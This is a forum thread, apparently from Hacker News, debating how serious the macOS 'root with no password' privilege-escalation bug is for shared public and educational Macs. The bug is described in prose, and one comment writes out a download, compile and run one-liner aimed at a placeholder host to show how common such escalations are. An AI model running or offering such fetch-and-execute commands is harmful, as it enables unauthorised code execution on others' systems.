LPE matters a lot for enterprise and educational customers.
What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.
>LPE matters a lot for enterprise and educational customers.
Surely not. In real life LPE bugs are far too common to matter a lot to anyone.
>What do you mean by exploited from within the sandbox? This is exploitable from any login prompt where the user has the ability to enter a username, including ones in the shell.
I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.
>I'm not familiar enough with the OS X sandbox, but I would guess that sandboxed applications aren't allowed to fill in login prompts. I might be wrong though.
Oh, right. I tend to kind of forget that the App Store serves any other purpose than to deliver software updates, as most of the applications on my Mac are from other sources. Yes, I agree that sandboxed apps are almost certainly prohibited from filling in login prompts by default. There does appear to be a system by which sandboxed apps can ask for additional permissions, but I'm not an OS X/macOS application developer so I have no idea how this permissions system works.
>Surely not. In real life LPE bugs are far too common to matter a lot to anyone.
LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.
>LPE bugs might be common but they're rarely as extremely straightforward as typing "root" into a login prompt with no password and pressing enter a few times.
Often enough a `wget http://xxx.xxx/xxx.c&&gcc xxx.c&&./a.out` will suffice. I'm not convinced that the ease of exploitation makes this bug particularly serious as an LPE.
LPEs are very serious for the countless college campuses, public libraries, and design print shops like Kinkos that offer public access to Mac computers.
Why is that significantly more serious than them running any other backdoor as a normal user?
I don't understand the threat model here, it is always completely unreasonable to expect that an attacker wouldn't easily be able to escalate privileges locally in a multi-user system.
... So, not at all? It's an LPE, for God's sake. EDIT: Apparently it affects remote desktop too, so not just an LPE.
Can this even be exploited from within the sandbox?